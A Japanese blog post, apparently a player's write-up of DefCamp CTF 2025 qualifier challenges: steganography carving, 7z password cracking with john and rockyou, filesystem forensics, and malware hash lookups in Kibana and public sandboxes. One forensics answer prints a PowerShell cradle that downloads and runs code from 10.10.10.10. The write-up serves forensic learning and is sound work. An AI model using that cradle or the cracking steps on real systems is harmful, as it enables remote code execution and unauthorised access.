{"id":1258,"date":"2025-09-15T20:10:53","date_gmt":"2025-09-15T11:10:53","guid":{"rendered":"https:\/\/emeth.jp\/diary\/?p=1258"},"modified":"2025-09-15T20:10:55","modified_gmt":"2025-09-15T11:10:55","slug":"defcamp-capture-the-flag-d-ctf-2025-quals-writeup","status":"publish","type":"post","link":"https:\/\/emeth.jp\/diary\/2025\/09\/defcamp-capture-the-flag-d-ctf-2025-quals-writeup\/","title":{"rendered":"DefCamp Capture the Flag (D-CTF) 2025 Quals writeup"},"content":{"rendered":"\n

\u30c1\u30fc\u30e0\u3067\u53c2\u52a0\u3057\u3066\u305f\u3002\u4e0a\u4f4d10\u30c1\u30fc\u30e0\u304c\u30eb\u30fc\u30de\u30cb\u30a2\u3067\u306e\u6c7a\u52dd\u306b\u884c\u3051\u308b\u3002\u4e0a\u4f4d30\u30c1\u30fc\u30e0\u306fwriteup\u306e\u63d0\u51fa\u304c\u5fc5\u9808\u3002\u3068\u3044\u3046\u3053\u3068\u306f7\u30c1\u30fc\u30e0\u63d0\u51fa\u3057\u306a\u3051\u308c\u3070\u30eb\u30fc\u30de\u30cb\u30a2\u306b\u884c\u3051\u308b\u3002\u3055\u3059\u304c\u306b\u305d\u308c\u306f\u306a\u3044\u3060\u308d\u3046\u3002\u6b8b\u5ff5\u3002<\/p>\n\n\n\n

\"\"<\/a><\/figure>\n\n\n\n

\u81ea\u5206\u306f4\u554f\u89e3\u3044\u305f\u3002Easy\u3068Medium\u3057\u304b\u89e3\u3051\u3066\u306a\u3044\u306e\u304c\u6094\u3057\u3044\u3002<\/p>\n\n\n\n\n\n\n\n

[Forensics][Easy] east-granma (148 solves, 50 pt)<\/h2>\n\n\n\n
\n

Investigate the wants of the most expensive club on the east coast.<\/p>\n<\/blockquote>\n\n\n\n

Q1. What is the flag? (Points: 50)<\/h3>\n\n\n\n

\u4e0e\u3048\u3089\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u3053\u3093\u306a\u753b\u50cf\u3002<\/p>\n\n\n\n

\"\"<\/a><\/figure>\n\n\n\n

CTF\u3067\u753b\u50cf\u304c\u4e0e\u3048\u3089\u308c\u305f\u3089\u30b9\u30c6\u30ac\u30ce\u3092\u7591\u3046\u3068\u3044\u3046\u3053\u3068\u3067\u3001Aperi’Solve\u306b\u7a81\u3063\u8fbc\u3080<\/a>\u3002\u753b\u50cf\u90e8\u5206\u306e\u30c7\u30fc\u30bf\u306b\u306f\u7279\u306b\u4f55\u3082\u306a\u304f\u3001Exiftool\u306e\u51fa\u529b\u3082\u304a\u304b\u3057\u306a\u3068\u3053\u308d\u306f\u7121\u304b\u3063\u305f\u304c\u3001Binwalk\u30677-zip\u30c7\u30fc\u30bf\u304c\u3042\u308b\u3068\u308f\u304b\u308b\u3002<\/p>\n\n\n\n

\"\"<\/a><\/figure>\n\n\n\n

\u5b9f\u969b\u306b binwalk<\/code> \u3092\u5b9f\u884c\u3059\u308b\u3068\u78ba\u304b\u306b\u4f55\u304b\u3042\u308b\u3002<\/p>\n\n\n

\n$ binwalk camashadefortza.jpg\n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------------------------\n0             0x0             JPEG image data, JFIF standard 1.01\n206006        0x324B6         7-zip archive data, version 0.4\n<\/pre><\/div>\n\n\n
\u5207\u308a\u51fa\u3057\u3066\u5c55\u958b\u3057\u3088\u3046\u3068\u3057\u305f\u3068\u3053\u308d\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u6c42\u3081\u3089\u308c\u308b\u3002<\/p>\n\n\n
\n$ dd if=camashadefortza.jpg of=data.7z bs=1 skip=206006\n327042+0 records in\n327042+0 records out\n327042 bytes (327 kB, 319 KiB) copied, 0.769518 s, 425 kB\/s\n<\/pre><\/div>\n\n
\n$ 7z x data.7z\n\n7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21\np7zip Version 16.02 (locale=C.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)\n\nScanning the drive for archives:\n1 file, 327042 bytes (320 KiB)\n\nExtracting archive: data.7z\n\nEnter password (will not be echoed):\n<\/pre><\/div>\n\n\n
rockyou\u3092\u4f7f\u3063\u3066\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u3057\u3066\u307f\u308b\u3068\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u30af\u30e9\u30c3\u30af\u306b\u6210\u529f\u3057\u305f\u3002<\/p>\n\n\n
\n$ 7z2john data.7z > data_7z_hash.txt\n$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt data_7z_hash.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (7z, 7-Zip archive encryption [SHA256 128\/128 AVX 4x AES])\nCost 1 (iteration count) is 524288 for all loaded hashes\nCost 2 (padding size) is 14 for all loaded hashes\nCost 3 (compression type) is 0 for all loaded hashes\nCost 4 (data length) is 130 for all loaded hashes\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\npasswordpassword (data.7z)     \n1g 0:00:13:50 DONE (2025-09-12 08:05) 0.001204g\/s 61.06p\/s 61.06c\/s 61.06C\/s patitos..optimusprime\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed. \n<\/pre><\/div>\n\n\n
7z\u30d5\u30a1\u30a4\u30eb\u3092\u5c55\u958b\u3059\u308b\u3068 beaches.001<\/code> \u304c\u51fa\u3066\u304d\u305f\u3002<\/p>\n\n\n
\n$  7z x data.7z\n\n7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21\np7zip Version 16.02 (locale=C.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)\n\nScanning the drive for archives:\n1 file, 327042 bytes (320 KiB)\n\nExtracting archive: data.7z\n\nEnter password (will not be echoed):\n--\nPath = data.7z\nType = 7z\nPhysical Size = 327042\nHeaders Size = 226\nMethod = LZMA2:12m 7zAES\nSolid = -\nBlocks = 1\n\nEverything is Ok\n\nSize:       10485760\nCompressed: 327042\n$ ls\nbeaches.001  camashadefortza.jpg  data.7z\n<\/pre><\/div>\n\n\n
\u30d5\u30a1\u30a4\u30eb\u30bf\u30a4\u30d7\u3092\u78ba\u8a8d\u3059\u308b\u3068\u3001DOS\u306e\u30d6\u30fc\u30c8\u30bb\u30af\u30bf\u3068\u51fa\u3066\u304d\u305f\u3002<\/p>\n\n\n
\n$ file beaches.001\nbeaches.001: DOS\/MBR boot sector, code offset 0x52+2, OEM-ID "NTFS    ", sectors\/cluster 8, Media descriptor 0xf8, sectors\/track 63, heads 255, hidden sectors 2048, dos < 4.0 BootSector (0), FAT (1Y bit by descriptor); NTFS, sectors\/track 63, physical drive 0x80, sectors 20479, $MFT start cluster 853, $MFTMirror start cluster 2, bytes\/RecordSegment 2^(-1*246), clusters\/index block 1, serial number 014844777844759fe; contains bootstrap BOOTMGR\n<\/pre><\/div>\n\n\n
\u3053\u3061\u3089\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u3082\u4f55\u304b\u96a0\u3055\u308c\u3066\u308b\u304b\u3082\u3068\u601d\u3044 binwalk<\/code> \u3092\u3057\u3066\u307f\u308b\u3068\u3001\u5927\u91cf\u306b\u51fa\u3066\u304d\u305f\u3002<\/p>\n\n\n
\n$ binwalk beaches.001\n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------------------------\n9998336       0x989000        JPEG image data, JFIF standard 1.01\n10010624      0x98C000        JPEG image data, JFIF standard 1.01\n10022912      0x98F000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10027008      0x990000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10031104      0x991000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10035200      0x992000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10039296      0x993000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10043392      0x994000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10047488      0x995000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10051584      0x996000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10057007      0x99752F        mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 4bit\n10067968      0x99A000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10072064      0x99B000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10104832      0x9A3000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10106547      0x9A36B3        mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 4bit\n10108928      0x9A4000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10113024      0x9A5000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10129408      0x9A9000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10145792      0x9AD000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10153984      0x9AF000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10169075      0x9B2AF3        bix header, header size: 64 bytes, header CRC: 0xFB655, created: 2092-06-12 05:57:38, image size: 1382593543 bytes, Data Address: 0x68E3, Entry Point: 0x7000068, data CRC: 0xFF000000, image type: Filesystem Image, compression type: none, image name: ""\n10215424      0x9BE000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10219520      0x9BF000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10342400      0x9DD000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10354688      0x9E0000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10362880      0x9E2000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10366976      0x9E3000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10371072      0x9E4000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10383360      0x9E7000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10387456      0x9E8000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10391552      0x9E9000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10395648      0x9EA000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10399744      0x9EB000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10403840      0x9EC000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10407936      0x9ED000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10412032      0x9EE000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10416128      0x9EF000        Ubiquiti partition header, header size: 56 bytes, name: "PART_P~1MOD ", base address: 0x4D4F4420, data size: -128255910 bytes\n10420224      0x9F0000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10424320      0x9F1000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10436608      0x9F4000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10444800      0x9F6000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10448896      0x9F7000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10452992      0x9F8000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10461184      0x9FA000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10465280      0x9FB000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10469376      0x9FC000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n10473472      0x9FD000        ELF, 32-bit LSB relocatable, Intel 80386, version 1 (SYSV)\n<\/pre><\/div>\n\n\n
\u8a66\u3057\u306b\u4e0a2\u3064\u306e\u753b\u50cf\u3092\u5207\u308a\u51fa\u3057\u3066\u307f\u308b\u3068\u4ee5\u4e0b\u306e\u901a\u308a\u3067\u3001\u96a0\u3055\u308c\u305f\u30c7\u30fc\u30bf\u306a\u3069\u306f\u898b\u3064\u304b\u3089\u305a\u3002<\/p>\n\n\n\n
\n
\n
\"\"<\/a><\/figure>\n<\/div>\n\n\n\n
\n
\"\"<\/a><\/figure>\n<\/div>\n<\/div>\n\n\n\n
\u7d50\u8ad6\u304b\u3089\u8a00\u3046\u3068 binwalk<\/code> \u3067\u898b\u3048\u3066\u304f\u308b\u3082\u306e\u306f\u5168\u3066rabbit hole\u3002\u3053\u308c\u304c\u554f\u984c\u306e\u30af\u30aa\u30ea\u30c6\u30a3\u3092\u4e0b\u3052\u3066\u3044\u308b\u3002<\/p>\n\n\n\n
beaches.001<\/code> \u3092FTK Imager\u3067\u898b\u3066\u307f\u308b\u3068\u3001\u30d5\u30a9\u30eb\u30c0\u3067\u6574\u7406\u3055\u308c\u305f\u5927\u91cf\u306e\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u304c\u898b\u3064\u304b\u308b\u304c\u3001\u4e00\u3064\u3060\u3051\u524a\u9664\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u304c\u3042\u308b\u3002\u4e2d\u306b\u306f\u30d5\u30e9\u30b0\u306e\u60c5\u5831\u304c\u66f8\u304b\u308c\u3066\u3044\u305f\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n
\n$ echo -n ctf{; echo -n vamonos | sha256sum | cut -d ' ' -f 1 | tr -d '\\n'; echo }\nctf{44ad656b71865ac4ad2e485cfbce17423e0aa0bcd9bcdf2d98a1cb1048cf4f0e}\n<\/pre><\/div>\n\n\n
Flag: ctf{44ad656b71865ac4ad2e485cfbce17423e0aa0bcd9bcdf2d98a1cb1048cf4f0e}<\/code><\/pre>\n\n\n\n
beaches.001<\/code> \u5185\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u69cb\u9020\u306f\u3001\/\u30a8\u30ea\u30a2\/\u5e97\u540d\/*.txt<\/code> \u3068\u306a\u3063\u3066\u3044\u305f\u3088\u3046\u3067\u3001preturi.txt<\/code> \u306b\u5546\u54c1\u306e\u4fa1\u683c\u304c\u66f8\u304b\u308c\u3066\u3044\u305f\u3002\u554f\u984c\u6587\u306e “the most expensive club on the east coast” \u3068\u3044\u3046\u306e\u304c\u30d2\u30f3\u30c8\u306b\u306a\u3063\u3066\u3044\u305f\u306e\u304b\u3082\u3057\u308c\u306a\u3044\u304c\u3001\u30d5\u30a9\u30eb\u30c0\u540d\u3084\u30c6\u30ad\u30b9\u30c8\u306e\u4e2d\u8eab\u304c\u30eb\u30fc\u30de\u30cb\u30a2\u8a9e\u3067\u66f8\u304b\u308c\u3066\u3044\u305f\u306e\u3067\u308f\u304b\u3089\u3093\u3002<\/p>\n\n\n\n
\u96e3\u6613\u5ea6Easy\u3060\u3063\u305f\u304c\u3001rabbit hole\u3092\u7528\u610f\u3057\u3066\u3044\u308b\u6642\u70b9\u3067Easy\u3068\u8a00\u3063\u3066\u306f\u3044\u3051\u306a\u3044\u3057\u8cea\u3082\u4f4e\u3044\u3068\u611f\u3058\u305f\u3002<\/p>\n\n\n\n
[Forensics][Medium] forensalyze-this (144 solves, 49 pt)<\/h2>\n\n\n\n
\n
Here’s some data\u2026 now it’s up to you to forensalyze this. Hidden deep inside these files are traces of activity, fragments of evidence, and digital fingerprints waiting to be uncovered.<\/p>\n<\/blockquote>\n\n\n\n
\u4e0e\u3048\u3089\u308c\u305f\u30c7\u30fc\u30bf\u306f\u30d5\u30a1\u30a4\u30eb\u30b7\u30b9\u30c6\u30e0\u306e\u30a4\u30e1\u30fc\u30b8\u30d5\u30a1\u30a4\u30eb\u3002Ubuntu\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u305f\u6a21\u69d8\u3002<\/p>\n\n\n
\n
\"\"<\/a><\/figure>\n<\/div>\n\n\n
Q1. What command is base64 encoded in the payload file? (Points: 7)<\/h3>\n\n\n\n
\/home\/user\/.cache\/.hidden\/payload.b64<\/code> \u306bBase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30b3\u30de\u30f3\u30c9\u304c\u898b\u3064\u304b\u308b\u306e\u3067\u3001\u3053\u308c\u3092\u30c7\u30b3\u30fc\u30c9\u3059\u308c\u3070OK<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: IEX ((new-object net.webclient).downloadstring(&#039;http:\/\/10.10.10.10:80\/exfil&#039;))<\/code><\/pre>\n\n\n\n
Q2. What is the SHA256 hash of the file being executed every 5 minutes via cron? (Points: 7)<\/h3>\n\n\n\n
\/var\/spool\/cron\/crontabs\/root<\/code> \u306b5\u5206\u304a\u304d\u306b\u5b9f\u884c\u3055\u308c\u308b\u30d5\u30a1\u30a4\u30eb\u304c\u66f8\u304b\u308c\u3066\u3044\u308b\u306e\u3067\u305d\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u62bd\u51fa\u3057\u3066\u30cf\u30c3\u30b7\u30e5\u3092\u53d6\u3063\u3066\u3084\u308c\u3070OK<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: 2e8eda459ca839d24b6c759e23f1fd8108da203a735077c3c85e4438318e174c<\/code><\/pre>\n\n\n\n
Q3. One of the image files contains embedded credentials. What is the password? (Points: 7)<\/h3>\n\n\n\n
\/home\/user\/Documents\/vacation_photo.jpg<\/code> \u304c\u5b9f\u969b\u306f\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u306a\u304f\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u3067\u3001\u4e2d\u306b\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u66f8\u304b\u308c\u3066\u3044\u305f\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: Secret123!<\/code><\/pre>\n\n\n\n
Q4. What is the name of the directory containing the Git repository? (Points: 7)<\/h3>\n\n\n\n
.git<\/code> \u30d5\u30a9\u30eb\u30c0\u304c \/home\/user\/Work\/<\/code> \u306b\u3042\u308b\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: Work<\/code><\/pre>\n\n\n\n
Q5. What is the department of Charlie Lee? (Points: 7)<\/h3>\n\n\n\n
\/home\/user\/Documents\/hr_records.csv<\/code> \u306b\u66f8\u304b\u308c\u3066\u3044\u305f\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: Engineering<\/code><\/pre>\n\n\n\n
Q6. What is the user ID and group ID of the work user? (Points: 7)<\/h3>\n\n\n\n
\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u30b7\u30b9\u30c6\u30e0\u306b\u306f \/etc<\/code> \u304c\u7121\u3044\u305f\u3081 \/etc\/passwd<\/code> \u306a\u3069\u304c\u5b58\u5728\u3057\u306a\u3044\u304c\u3001\/var\/backups<\/code> \u4ee5\u4e0b\u306b\u30d0\u30c3\u30af\u30a2\u30c3\u30d7\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u304c\u6b8b\u3063\u3066\u3044\u305f\u306e\u3067\u3001\/var\/backups\/passwd.bak<\/code> \u304b\u3089 work<\/code> \u30e6\u30fc\u30b6\u306eUID\u3068GID\u3092\u78ba\u8a8d\u3067\u304d\u305f\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: 1000:1000<\/code><\/pre>\n\n\n\n
Q7. When did the first execution of the cron.daily job end? (Points: 7)<\/h3>\n\n\n\n
\u30de\u30a6\u30f3\u30c8\u3057\u3066 \/var\/log<\/code> \u5185\u3067 cron.daily<\/code> \u3067 grep<\/code> \u3059\u308b\u3068\u60c5\u5831\u304c\u5f97\u3089\u308c\u305f\u3002<\/p>\n\n\n
\n$ grep -RI cron.daily *\nsyslog:Aug 28 12:12:35 work anacron[706]: Job `cron.daily' terminated\nsyslog.1:Aug 28 12:07:25 work anacron[706]: Will run job `cron.daily' in 5 min.\nsyslog.1:Aug 28 12:12:26 work anacron[706]: Job `cron.daily' started\nsyslog.1:Aug 28 12:12:26 work anacron[2084]: Updated timestamp for job `cron.daily' to 2025-08-28\n<\/pre><\/div>\n\n\n
Flag: 12:12:35<\/code><\/pre>\n\n\n\n
\u30d5\u30a1\u30a4\u30eb\u30b7\u30b9\u30c6\u30e0\u3092\u63a2\u691c\u3057\u3066\u308b\u3060\u3051\u3067\u3060\u3044\u305f\u3044\u89e3\u3051\u308b\u306e\u3067\u3053\u3063\u3061\u306e\u554f\u984c\u306e\u65b9\u304cEasy\u3058\u3083\u306a\u3044\u304b\u306a\u2026<\/p>\n\n\n\n
[Threat hunting][Medium] grandbazaar (38 solves, 192 pt)<\/h2>\n\n\n\n
\n
Can you identify the threats in the Grand Bazaar of activities?<\/p>\n<\/blockquote>\n\n\n\n
\u4e0e\u3048\u3089\u308c\u305f\u30c7\u30fc\u30bf\u306fDocker\u30b3\u30f3\u30c6\u30ca\u306e\u60c5\u5831\u3068\u305d\u306e\u30c7\u30fc\u30bf\u3002\u5c55\u958b\u3057\u3066 docker compose up -d<\/code> \u3059\u308b\u3068Elasticsearch\u3068Kibana\u304c\u7acb\u3061\u4e0a\u304c\u308a\u3001\u305d\u308c\u3092\u4f7f\u3063\u3066\u5206\u6790\u3059\u308b\u554f\u984c\u3002Kibana\u306e\u30dd\u30fc\u30c8\u3084\u30ed\u30b0\u30a4\u30f3\u306e\u305f\u3081\u306euser\/pass\u306f docker-compose.yml<\/code> \u3092\u898b\u308b\u3068\u308f\u304b\u308b\u3002<\/p>\n\n\n\n
Q1. How many alerts there exists in total in the elastic data? (Points: 7)<\/h3>\n\n\n\n
\u5de6\u306e\u30e1\u30cb\u30e5\u30fc\u304b\u3089 Securtiy \u2192 Alerts \u306b\u884c\u304f\u3068\u30a2\u30e9\u30fc\u30c8\u6570\u304c\u308f\u304b\u308b\u3002\u306a\u304a\u3001\u30a4\u30d9\u30f3\u30c8\u306f\u5168\u30662025-08-29\u306b\u767a\u751f\u3057\u3066\u3044\u308b\u305f\u3081\u305d\u3053\u3092\u542b\u3081\u305f\u671f\u9593\u306b\u3059\u308b\u3068\u5168\u30a4\u30d9\u30f3\u30c8\u3092\u7db2\u7f85\u3067\u304d\u308b\u3002<\/p>\n\n\n
\n
\"\"<\/a><\/figure>\n<\/div>\n\n\n
Flag: 23<\/code><\/pre>\n\n\n\n
Q2. What are the hashes of the threats? (Points: 19)<\/h3>\n\n\n\n
\u30a2\u30e9\u30fc\u30c8\u306b\u306a\u3063\u3066\u3044\u308b\u30d7\u30ed\u30bb\u30b9\u306e\u89aa\u30d7\u30ed\u30bb\u30b9\u3092\u8fbf\u3063\u3066\u3044\u304f\u3068\u3001\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u306b\u3042\u308b2\u3064\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u8d77\u70b9\u3068\u3057\u3066\u602a\u3057\u3044\u6d3b\u52d5\u304c\u884c\u308f\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
\u3053\u308c\u3089\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u30cf\u30c3\u30b7\u30e5\u5024\u3092\u8abf\u67fb\u3059\u308c\u3070\u3088\u3044\uff08\u5b9f\u969b\u306f\u30d5\u30a1\u30a4\u30eb\u540d\u304cSHA256\u30cf\u30c3\u30b7\u30e5\u5024\u3060\u3063\u305f\u304c\u305d\u308c\u304c\u6b63\u3057\u3044\u3068\u3082\u9650\u3089\u306a\u3044\u306e\u3067\u3061\u3083\u3093\u3068\u8abf\u3079\u308b\uff09<\/p>\n\n\n\n
Flag: DCTF{a31e56a60d7c9b547b1e7dfe402d7fb02789dcd117eadf59593e5401460843d4:a2254802dd387d0e0ceb61e2849a44b51879f625b89879e29592c80da9d479a2}<\/code><\/pre>\n\n\n\n
Q3. What is the SHA3-384 hash of the second threat? (Points: 24)<\/h3>\n\n\n\n
Elasticsearch\u306b\u3042\u308b\u30ed\u30b0\u306b\u306fSHA3-384\u306e\u30c7\u30fc\u30bf\u306f\u8a18\u9332\u3055\u308c\u3066\u3044\u306a\u3044\u304c\u3001SHA256\u306e\u30cf\u30c3\u30b7\u30e5\u5024\u306f\u5206\u304b\u308b\u306e\u3067\u305d\u308c\u3092\u30ad\u30fc\u306b\u5916\u90e8\u30c7\u30fc\u30bf\u3092\u8abf\u67fb\u3059\u308b\u3002\u3059\u308b\u3068\u3001MalwareBazaar<\/a>\u306b\u60c5\u5831\u304c\u3042\u3063\u305f\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: DCTF{4f9c609d2f44b18b359d2e52061889302da0dca8e3d244a3e4759b5e78463a9e9fc9046d4acd3e0c7a866f0a01beff3b}<\/code><\/pre>\n\n\n\n
Q4. What programming language did the first malware used? (Points: 18)<\/h3>\n\n\n\n
\u3053\u306e\u60c5\u5831\u3082Elasticsearch\u306b\u306f\u306a\u3044\u306e\u3067\u5916\u90e8\u60c5\u5831\u3092\u8abf\u67fb\u3059\u308b\u3002MalwareBazaar\u306e\u30da\u30fc\u30b8<\/a>\u306b\u3042\u308b “Vendor Threat Intelligence” \u304b\u3089\u4ed6\u306e\u30b5\u30a4\u30c8\u3067\u306e\u8abf\u67fb\u7d50\u679c\u3092\u78ba\u8a8d\u3067\u304d\u308b\u3002<\/p>\n\n\n\n
CAPE\u306e\u60c5\u5831<\/a>\u3092\u78ba\u8a8d\u3059\u308b\u3068\u3001”Detect It Easy” \u306e\u9805\u76ee\u306b “Packer: PyInstaller(modified)” \u3068\u3042\u308a\u3001\u3053\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u304cPython\u3067\u66f8\u304b\u308cPyInstaller\u3067exe\u5316\u3055\u308c\u305f\u3082\u306e\u3068\u308f\u304b\u308b\u3002<\/p>\n\n\n
\n
\"\"<\/a><\/figure>\n<\/div>\n\n\n
Flag: DCTF{Python}<\/code><\/pre>\n\n\n\n
\u5225\u89e3\u3068\u3057\u3066\u3001Filescan.io\u306e\u60c5\u5831<\/a>\u3092\u898b\u308b\u3068\u30d5\u30a1\u30a4\u30eb\u30a2\u30a4\u30b3\u30f3\u304c\u3042\u308a\u3001PyInstaller\u306e\u30a2\u30a4\u30b3\u30f3\u3067\u3042\u308b\u306e\u3067Python\u3067\u66f8\u304b\u308c\u305f\u3068\u308f\u304b\u308b\u3002<\/p>\n\n\n
\n
\"\"<\/a><\/figure>\n<\/div>\n\n\n
Q5. What domain did the first malware tried to contact? (Points: 20)<\/h3>\n\n\n\n
VirusTotal\u306e\u60c5\u5831<\/a>\u306b\u3042\u308b “BEHAVIOR” \u304b\u3089CAPE Sandbox\u306eNetwork Communication\u306e\u60c5\u5831\u3092\u898b\u308b\u3068\u3001”discord.com” \u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002\u306a\u304a\u3001CAPE<\/a>\u3067\u306f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306e\u60c5\u5831\u306f\u7121\u3057\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n
\n
\"\"<\/a><\/figure>\n<\/div>\n\n\n
Flag: DCTF{discord.com}<\/code><\/pre>\n\n\n\n
Q6. How many selecting options did the first malware GUI had? (Points: 21)<\/h3>\n\n\n\n
\u3069\u306e\u30d9\u30f3\u30c0\u306e\u60c5\u5831\u3067\u3082\u3044\u3044\u304c\u3001\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3092\u898b\u308b\u3068\u9078\u629e\u80a2\u304c2\u3064\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002\u4ee5\u4e0b\u306fHybrid Analysis<\/a>\u3088\u308a\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: 2<\/code><\/pre>\n\n\n\n
Q7. What MITRE Technique did the second malware with the \u201clegitimate\u201d process used? (Points: 21)<\/h3>\n\n\n\n
\u4e45\u3005\u306bKibana\u306b\u623b\u308b\u30022\u3064\u3081\u306e\u30de\u30eb\u30a6\u30a7\u30a2\uff08a22548\uff5e\uff09\u306f svchost.exe<\/code> \u3092\u5b50\u30d7\u30ed\u30bb\u30b9\u3068\u3057\u3066\u5b9f\u884c\u3057\u3066\u3044\u308b\u304c\u3001\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u30d1\u30b9\u306f C:\\Users\\malware\\AppData\\Roaming<\/code> \u3067\u3042\u308a\u3001Windows\u306e\u6b63\u898f\u306e svchost.exe<\/code> \u3067\u306f\u306a\u3044\u3002\u3053\u306e\u3088\u3046\u306b\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u6b63\u898f\u306e\u30d7\u30ed\u30bb\u30b9\u306b\u507d\u88c5\u3057\u3066\u3044\u308b\u3002\u3053\u308c\u306b\u5bfe\u5fdc\u3059\u308bMITRE ATT&CK\u306eTechnique\u306fMasquerading<\/a>\u3067\u3042\u308a\u3001Technique ID\u306f T1036<\/code> 